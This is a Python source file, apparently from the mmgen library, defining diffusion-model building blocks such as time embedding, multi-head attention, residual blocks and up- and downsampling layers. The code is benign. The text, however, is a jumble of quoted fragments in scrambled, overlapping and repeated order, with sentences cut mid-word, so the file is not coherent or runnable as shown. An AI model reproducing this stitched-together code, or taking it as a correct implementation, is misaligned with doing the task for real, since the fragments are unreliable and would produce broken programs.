build_activation_layer(act_cfg), nn.Dropout(dropout),", "in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg),", "import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer", "with_conv (bool, optional): Whether use convolution operation for downsampling. Defaults to `True`. \"\"\"", "results. Otherwise, embedding results will directly add to input of normalization layer. Args:", "c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference", "``out * (1 + scale) + shift``. Otherwise, the output of Embedding layer", "Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32),", "in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else:", "dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function", "(bool, optional): Use inplace operation or not. Defaults to `False`. \"\"\" def __init__(self,", "build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential):", "Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__", "embedding. embedding_mode (str, optional): Embedding mode for the time embedding. Defaults to 'sin'.", "(torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or shared label", "use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels", "in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers. out_channels (int, optional):", "to re-shift and re-scale normalization results. Otherwise, embedding results will directly add to", "but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels", "self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the", "other. Originally ported from here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. #", "return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise.", "shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x)", "children that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def", "the embedding. max_period (int, optional): Controls the minimum frequency of the embeddings. Defaults", "time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal", "of the input feature map. embedding_channels (int): Number of channels of the input", "layer will be split to 'scale' and 'shift' and map the output of", "for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x", "num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`.", "embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network.", "SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if", "activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None,", "return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to", "results will directly add to input of normalization layer. Args: in_channels (int): Number", "will directly add to input of normalization layer. Args: in_channels (int): Number of", "to 'scale' and 'shift' and map the output of normalization layer to ``out", "the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding.", "with_conv (bool, optional): Whether apply an additional convolution layer after upsampling. Defaults to", "in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut", "to the children that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35", "= deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels,", "feature map to be downsampled. with_conv (bool, optional): Whether apply an additional convolution", "(SiLU) function, element-wise. The SiLU function is also known as the swish function.", "convolution layer after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__()", "= build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer", "networks. Args: in_channels (int): The channel number of the input feature map. embedding_channels", "[ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg =", "for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm,", "@staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep", "3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg)", "to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class", "/ half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)", "attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention.", "_, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else", "dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D", "results shape as `[bz, dim]`. \"\"\" half = dim // 2 freqs =", "_, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3,", "mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for", "padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self,", "self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x = layer(x) return", "inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch < 1.6.0,", "dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn =", "else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args:", "* scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight", "downsample operation. Args: in_channels (int): Number of channels of the input feature map", "_norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg),", "layers will be added. Args: in_channels (int): Number of channels of the input", "torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q *", "the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout,", "# add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not", "and used to re-shift and re-scale normalization results. Otherwise, embedding results will directly", "from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init", "map. num_heads (int, optional): Number of heads in the attention. norm_cfg (dict, optional):", "map. embedding_channels (int) Number of channels of the input embedding. norm_cfg (dict, optional):", "= nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling", "dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def", "] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support", "Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers.", "dim=-1) if dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return", "Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling.", "np import torch import torch.nn as nn import torch.nn.functional as F from mmcv.cnn", "Number of channels of the input feature map. embedding_channels (int): Number of channels", "\"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding results will be chunked", "shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None,", "build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in", "for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create", "norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels,", "feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale,", "F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import", "of normalization layer to ``out * (1 + scale) + shift``. Otherwise, the", "* 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def", "self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] //", "@MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users to", "x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])", "time embedding or shared label embedding. Returns: torch.Tensor : Output feature map tensor.", "to attend to each other. Originally ported from here, but adapted to the", "True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function", "\"\"\"Time embedding layer, reference to Two level embedding. First embedding time by an", "padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding", "= timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim %", "torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x * (1 + scale)", "channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1) scale", "`1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels !=", "= build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels,", "self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding, '", "embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels,", "optional): Number of heads in the attention. norm_cfg (dict, optional): Config for normalization", "DenoisingResBlock): x = layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class", "torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks", "kernel size for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels,", "(bool, optional): Whether use convolution operation for downsampling. Defaults to `True`. \"\"\" def", "def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map tensor.", "return x def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature", "embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN':", "embedding def forward(self, t): \"\"\"Forward function for time embedding layer. Args: t (torch.Tensor):", "downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map", "Whether apply an additional convolution layer after upsampling. Defaults to `True`. \"\"\" def", "for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\"", "function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding", "be chunked and used to re-shift and re-scale normalization results. Otherwise, embedding results", "output of Embedding layer will be split to 'scale' and 'shift' and map", "layer. dropout (float): Probability of the dropout layers. out_channels (int, optional): Number of", "inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output =", "class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not equals to `out_channels`,", "x): \"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input feature map.", "import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from", "of the input feature map to be downsampled. with_conv (bool, optional): Whether use", "super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample =", "import numpy as np import torch import torch.nn as nn import torch.nn.functional as", "Config for time embedding. Defaults to None. act_cfg (dict, optional): Config for activation", "Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config", "torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for", "h = self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0)", "with embedding layer. If `use_scale_shift == True`, embedding results will be chunked and", "to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer will", "0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding", "embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If", "import torch import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import", "], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut", "upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x = self.conv(x) return", "f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args:", "y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid", "`dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg)", "not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def", "num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _,", "the output embedding. embedding_mode (str, optional): Embedding mode for the time embedding. Defaults", "embedding_mode (str, optional): Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg", "equals to `out_channels`, a learnable shortcut with conv layers will be added. Args:", "use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the", "norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv =", "(int, optional): Number of heads in the attention. norm_cfg (dict, optional): Config for", "of the input embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults", "weight def forward(self, x): \"\"\"Forward function for multi head attention. Args: x (torch.Tensor):", "else: raise ValueError('Only support `SIN` for time embedding, ' f'but receive {embedding_mode}.') @staticmethod", "``[bz, ]``, one per batch element. dim (int): The dimension of the embedding.", "used in the denoising network. Support average pooling and convolution for downsample operation.", "self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights()", "that passes timestep embeddings to the children that support it as an extra", "of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as `[bz,", "= nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return", "pooling and convolution for downsample operation. Args: in_channels (int): Number of channels of", "@MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding results", "be downsampled. with_conv (bool, optional): Whether use convolution operation for downsampling. Defaults to", "feature map. num_heads (int, optional): Number of heads in the attention. norm_cfg (dict,", "x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function.", "input feature map to be downsampled. with_conv (bool, optional): Whether apply an additional", "1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1]", "the nearest interpolation operation. Args: in_channels (int): Number of channels of the input", "embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2,", "torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward", "(int): Number of channels of the input feature map. embedding_channels (int) Number of", "@MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not equals to", "(torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0':", "optional): Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional):", "(dict, optional): Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool):", "c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h", "chunked and used to re-shift and re-scale normalization results. Otherwise, embedding results will", "= self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h +", "in [ 1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but", "function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation.", "of channels of the input feature map to be downsampled. with_conv (bool, optional):", "and 'shift' and map the output of normalization layer to ``out * (1", "to None. act_cfg (dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``.", "rights reserved. from copy import deepcopy from functools import partial import mmcv import", "optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional):", "of the output embedding. embedding_mode (str, optional): Embedding mode for the time embedding.", "normalization layer. Args: in_channels (int): Number of channels of the input feature map.", ":, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x =", "the swish function. Args: input (bool, optional): Use inplace operation or not. Defaults", "of channels of the input feature map. embedding_channels (int): Number of channels of", "def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels,", "optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels,", "Controls the minimum frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding", "optional): Controls the minimum frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor:", "Args: input (bool, optional): Use inplace operation or not. Defaults to `False`. \"\"\"", "b, c, *spatial = x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x))", "torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv:", "torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1)", "layer after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if", "def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to", "after activation. \"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x,", "(dict, optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict,", "`shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding", "= num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3,", "out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1,", "as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import", "optional): The config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int,", "to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True", "% 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self,", "input feature map. embedding_channels (int): Number of channels of the input embedding. use_scale_shift_norm", "`out_channels`, a learnable shortcut with conv layers will be added. Args: in_channels (int):", "function, then feed to neural networks. Args: in_channels (int): The channel number of", "-np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None]", "= nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'),", "Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if", "channels of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer.", "init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding", "to be downsampled. with_conv (bool, optional): Whether use convolution operation for downsampling. Defaults", "embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x", "1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight", "= [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert", "class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to the children that", "`NormWithEmbedding` layer. dropout (float): Probability of the dropout layers. out_channels (int, optional): Number", "build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if", "= partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding, ' f'but", "= dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 =", "(dict, optional): The config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size", "Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True,", "map tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor", "= self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h", "embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz, ]``,", "__init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels", "in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels =", "import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that", "self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels", "from functools import partial import mmcv import numpy as np import torch import", "forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map tensor. y", "``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation layers. Defaults to", "input of normalization layer. Args: in_channels (int): Number of channels of the input", "module that passes timestep embeddings to the children that support it as an", "optional): Whether apply an additional convolution layer after upsampling. Defaults to `True`. \"\"\"", "Two level embedding. First embedding time by an embedding function, then feed to", "DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not equals to `out_channels`, a", "= 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k * scale)", "shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else out_channels _norm_cfg =", "inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim`", "element. dim (int): The dimension of the embedding. max_period (int, optional): Controls the", "additional convolution layer after the nearest interpolation operation. Args: in_channels (int): Number of", "build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to the children", "directly add to input of normalization layer. Args: in_channels (int): Number of channels", "a learnable shortcut with conv layers will be added. Args: in_channels (int): Number", "per batch element. dim (int): The dimension of the embedding. max_period (int, optional):", "// 3 q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1 /", "for multi head attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature", "after the nearest interpolation operation. Args: in_channels (int): Number of channels of the", "def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns:", "of the input feature map. num_heads (int, optional): Number of heads in the", "embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels", "class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding. First embedding time", "layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the", "def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3,", "= x * (1 + scale) + shift else: x = self.norm(x +", "mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module", "shortcut_kernel_size (int, optional): The kernel size for the shortcut conv. Defaults to ``1``.", "[ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size", "support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x,", "(int) Number of channels of the input embedding. norm_cfg (dict, optional): Config for", "too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation layers. Defaults", "class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average pooling and", "added. Args: in_channels (int): Number of channels of the input feature map. embedding_channels", "if dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding", "in_channels (int): Number of channels of the input feature map. embedding_channels (int): Number", "for time embedding. Defaults to None. act_cfg (dict, optional): Config for activation layer.", "here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int):", "Input feature map tensor. y (torch.Tensor): Shared time embedding or shared label embedding.", "neural networks. Args: in_channels (int): The channel number of the input feature map.", "the denoising network. Support average pooling and convolution for downsample operation. Args: in_channels", "the minimum frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results", "after attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b, c, -1)", "`in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for the normalization layers.", "normalization results. Otherwise, embedding results will directly add to input of normalization layer.", "torch.Tensor : Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x)", "scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers. out_channels (int,", "self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut:", "= use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if", "time embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\"", "q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct',", "import mmcv import numpy as np import torch import torch.nn as nn import", "normalization operation. Defaults to `dict(type='GN', 